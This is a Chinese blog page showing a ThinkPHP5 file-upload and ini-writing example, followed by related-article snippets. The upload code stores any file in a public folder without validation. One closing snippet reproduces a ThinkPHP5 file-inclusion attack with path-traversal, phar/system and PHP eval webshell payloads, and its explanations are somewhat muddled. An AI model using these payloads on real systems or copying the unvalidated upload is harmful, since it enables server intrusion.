thinkphp5文件写入的方法示例

最新推荐文章于 2021-06-22 17:54:47 发布
原创 最新推荐文章于 2021-06-22 17:54:47 发布 · 6.8k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个简单的文件上传功能实现方式,包括HTML表单设计、PHP数据处理及文件存储流程。展示了如何通过表单提交文件,并在服务器端进行验证、存储及数据库记录。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

//html部分示例
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="https://www.shizhanzhe.com/js/jquery1.42.min.js"></script>
</head>
<body>
<form action="/index.php/index/index/gaoUpload" method="post" enctype="multipart/form-data">
    <input type="text" name="gaoname" value="" placeholder="图片名称,支持字母或数字"><br/>
    <input type="text" name="gaourl" value="" placeholder="图片链接"><br/>
    <input type="file" name="gaopic" value=""><br/>
    <input type="submit"  value="上传">
</form>
</body>
</html>

//页面渲染

public function gaoPic(){
  return $this->fetch();
 }

//数据提交方法

public function gaoUpload(){
    $request = request();//think助手函数
    $data_get = $request->param();//获取get与post数据
    $file = request()->file('gaopic');
    $info = $file->move(ROOT_PATH . 'public' . DS . 'uploads/gao');
    if($info){
        //组装新数据
        $gao_data = array(
            'gaoname'=>$data_get['gaoname'],
            'gaopic'=>$info->getSaveName(),
            'gaourl'=>$data_get['gaourl']
         );
         //获取文件的信息
         $gao_json = file_get_contents('gaopic.ini');
         $gao_arr = json_decode($gao_json,true);
         $gao_arr[] = $gao_data;
         $gao_content = json_encode($gao_arr);
         //创建ini文件
         $gao_file = fopen("gaopic.ini","w+") or die("Unable to open file!");
         //将内容写入文件
         fwrite($gao_file, $gao_content);
         //关闭文件
          fclose($gao_file);
      }
  }
如何实现Thinkphp的日志写入
刘杨造梦的博客
11-09 999
TP通过配置文件对日志进行设置.要开启日志记录,必须在配置中开启LOG_RECORD参数,以及可以在项目配置文件中配置需要记录的日志级别。当Debug=false时,才会读取config.php的Log配置,即此时config.php配置才会生效.根据TP的define(‘APP_DEBUG’,false)的设置不同,TP会读取不同的配置文件,3>. write写入日志是不受Log配置文件控制的,无论你怎么设置,都会输出写入文件.Tp的日志输出核心类为 TP/Lib/Core/Log.class.php.
TP5写日志记录
luogan129的博客
01-19 1万+
TP5写日志记录 /*写文件*/ function dingding_log($pay_type,$content){ $filename =$_SERVER['DOCUMENT_ROOT']. '/dingding_log/'.$pay_type.date('Y-m-d').'.txt'; $Ts=fopen($filename,"a+"); fputs($Ts,"
Thinkphp6.0 任意文件写入
feng的博客
03-12 2360
准备 创建代码: composer create-project topthink/think thinkphp6.0.1 "require": { "php": ">=7.1.0", "topthink/framework": "6.0.1", "topthink/think-orm": "^2.0" }, composer update ThinkPHP6默认不开启session,我们需要修改app\middleware.ph
thinkPHPtxt日志文件
weixin_30922589的博客
08-17 453
file_put_contents(DATA_PATH.'文件名.txt','收到请求:'.date('Y-m-dH:i:s').PHP_EOL.'通知信息:'.$显示的变量名.PHP_EOL.PHP_EOL.PHP_EOL,FILE_APPEND); 转载于:https://www.cnblogs.com/mthp/p/7381923.html...
thinkphp5怎么获取项目根目录和之前的__ROOT__一样
热门推荐
飞鱼计划
06-05 2万+
THINK_PATH 框架系统目录 ROOT_PATH 框架应用根目录 APP_PATH 应用目录(默认为application) CONF_PATH 配置目录(默认为APP_PATH) LIB_PATH 系统类库目录(默认为 THINK_PATH.'library/') CORE_PATH 系统核心类库目录 (默认为 LIB_PATH.'think/') TRAIT_PATH 系统trait目...
TP5 创建文件写入内容
joker6295的博客
12-03 5290
/** * [payLog 支付日志log] * @param [type] $mark [备注] * @param [type] $log_content [内容] * @param string $keyp [名] * @return [type] [description] */ public function m...
tp5中如何将数据库数据写入文件
搬砖中
09-10 771
** tp5中如何将数据库数据写入文件 ** $data = Db::name(‘yydq’)->select(); foreach($data as k=>k=>k=>v){ $word = $v[‘head’]; $yy = ‘https://www.123.com/’. word.′/′.′<br>′;//fileputcontents(′./../public/uploads/robot/yy.txt′,word .'/'. '<br>'; //
通过thinkphp5+PHPOffice读取word文件写入到html文件
04-28
接下来,我们需要创建一个ThinkPHP5的控制器来处理读取Word文件写入HTML的过程。在控制器中,可以使用PHPWord提供的API来读取.docx文件,然后将其内容转换成HTML格式。以下是一个简单的示例代码: ```php ...
thinkphp5框架扩展redis类方法示例
01-03
笔者在开发时发现,thinkphp5的自带redis类方法,只有简单的读取缓存、写入缓存的基本方法,远不能满足我们业务的需求。redis本身支持五种数据类型,string(字符串)、hash(哈希)、list(列表)、set(集合)、zset(有序...
thinkphp的c方法使用示例
12-18
加载配置文件写入C方法: ```php C(include 'config.php'); // 现在可以使用 C('DB') 获取数据库配置 ``` ### 动态添加配置 `thinkphp`的C方法还支持动态添加或修改配置,如以下示例所示: ```php C(array('...
thInkphp 写入文件
lengxin337的专栏
05-05 2375
$path = APP_PATH . 'Common/Conf/setting.php';    \Think\Storage::put($path, '<?php return  '.var_export($data, true).';', 'F');
tp5 File文件写入(生成静态文件)
灰熊
06-14 7009
利用\think\template\driver\File.php文件整合buildHtml 1.在controller.php创建方法如下 /** * 创建静态页面 * @access protected * @htmlfile 生成的静态文件名称 * @htmlpath 生成的静态文件路径 * @param string $templateFile 指...
php 生成txt文件并下载
老哥—
02-22 7107
&lt;?php header("Content-type: text/html; charset=utf-8"); try{ $conn = new PDO("mysql:host=localhost;dbname=xxx","xxx","xxx"); $conn-&gt;setAttribute(PDO::ATTR_ERRMODE,PDO::ER...
TP5 使用文件缓存
wbj16116的博客
03-20 8381
Cache,就是缓存的意思, 如果要用的话可以 :先use一下 use think\Cache; 然后就可以调用get().set().方法了 Cache::set(‘name’, ‘wbj’); Cache::set(‘name’, ‘wbj’,3600); 第三个参数默认为0,表示无限有有效期,(有效期) return Cache::get(‘name’);...
TP5的目录及文件作用
admin_cola的博客
09-24 6351
TP5的目录及文件作用 TP5  application -> 应用目录  做主要开发       index -> 模块目录            controller -> 控制器 TP5的命名和之前不一样 更简洁       command.php -> 命令行工具配置文件       common.php -> 应用公共函数文件 可以在这个地方自定义相关函数 在其他地方直接使用
5)学习tp5之请求
西瓜的博客
04-01 1346
一般请求1、定义路由2、控制器代码手册-》请求-》输入变量-》变量获取手册-》请求-》输入变量-》变量过滤session请求(cookie也是这样)1、定义路由2、控制器代码判断请求1、定义路由2、控制器代码方法注入...
tp5 生成JSON文件file_put_contents()和读出数据file_get_contents
php菜鸟技术天地
09-15 5709
//// 生成一个PHP数组 $data = array(); $data[0] = array('1','吴者然','onestopweb.cn'); $data[1] = array('2','何开','iteye.com'); // 把PHP数组转成JSON字符串 //dump($data); $json_string = json_encode($da...
TP5导入导出
叶落无痕的博客
06-22 298
参考:https://blog.youkuaiyun.com/a836236241/article/details/105528207
THinkPHP 读写文件相关
power0405hf的专栏
05-04 7671
public function file(&$txt){ $myfile = fopen("./data/1.txt", "a+") or die("Unable to open file!"); fwrite($myfile, $txt); $txt = ","; fwrite($myfile, $txt); $a= fread($myfile,filesize
thinkphp5文件包含漏洞复现
最新发布
04-03
### ThinkPHP5 文件包含漏洞复现教程 #### 背景介绍 ThinkPHP 是一款流行的 PHP 开源框架,广泛应用于 Web 应用开发。然而,在某些特定条件下,该框架可能存在严重的安全漏洞。例如,当启用多语言功能或模板引擎未正确处理输入时,可能导致文件包含漏洞甚至远程代码执行 (RCE)[^1]。 受影响的版本包括但不限于以下范围: - **ThinkPHP 5.x 版本**[^2] 以下是针对此漏洞的安全测试方法: --- #### 配置环境准备 为了成功复现漏洞,需搭建一个易受攻击的 ThinkPHP 环境。具体操作如下: 1. 下载并安装目标版本的 ThinkPHP 框架。 2. 修改配置文件 `/application/config.php` 中的相关参数以激活多语言支持: ```php 'lang_switch_on' => true, ``` 此设置允许通过 URL 参数切换语言文件[^3]。 --- #### 利用过程详解 ##### 1. 构造恶意请求触发文件包含 利用 `lang` 参数传递特殊路径字符串来访问任意本地文件。例如: ``` http://localhost/index.php?s=index/think\..\think/library/driver/view/Php.php&lang=../../../../../../etc/passwd%00 ``` 上述 URL 尝试读取系统的 `/etc/passwd` 文件作为伪翻译资源加载到应用中。 ##### 2. 实现 RCE 的关键点—— pearcmd 巧妙运用 进一步深入挖掘发现,如果能够控制被引入的内容,则可注入恶意脚本完成命令执行。这里借助默认存在的 `pearcmd` 功能达成目的: ``` ?file=phar://./vendor/composer/autoload_files.php/a.php&filter[]=system&content=id ``` 这条链路最终会调用 system 函数运行 id 命令[^4]。 ##### 3. Session 文件写入与提权尝试 除了直接嵌套外部实体外,还可以操控 session 数据存储机制生成自定义 php shell 。按照惯例,session ID 存储于浏览器 cookies 内部;因此只需伪造相应字段即可指定保存位置以及内容格式化方式为期望形式: ``` Cookie: PHPSESSID=test; sess_test=<?php @eval($_POST['c']);?> ``` 随后再次发送 GET 请求至服务器端口监听处等待交互响应[^5]。 --- #### 编码实践建议 尽管以上演示展示了潜在风险所在之处,但在实际项目部署过程中应当采取有效措施规避此类隐患发生概率最大化降低危害程度比如加强输入验证逻辑或者关闭不必要的扩展特性等等。 ```bash # 示例防御手段之一:严格校验所有动态传参合法性 if (!preg_match('/^[a-zA-Z0-9_-]+$/', $_GET['param'])) { die('Invalid input'); } ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值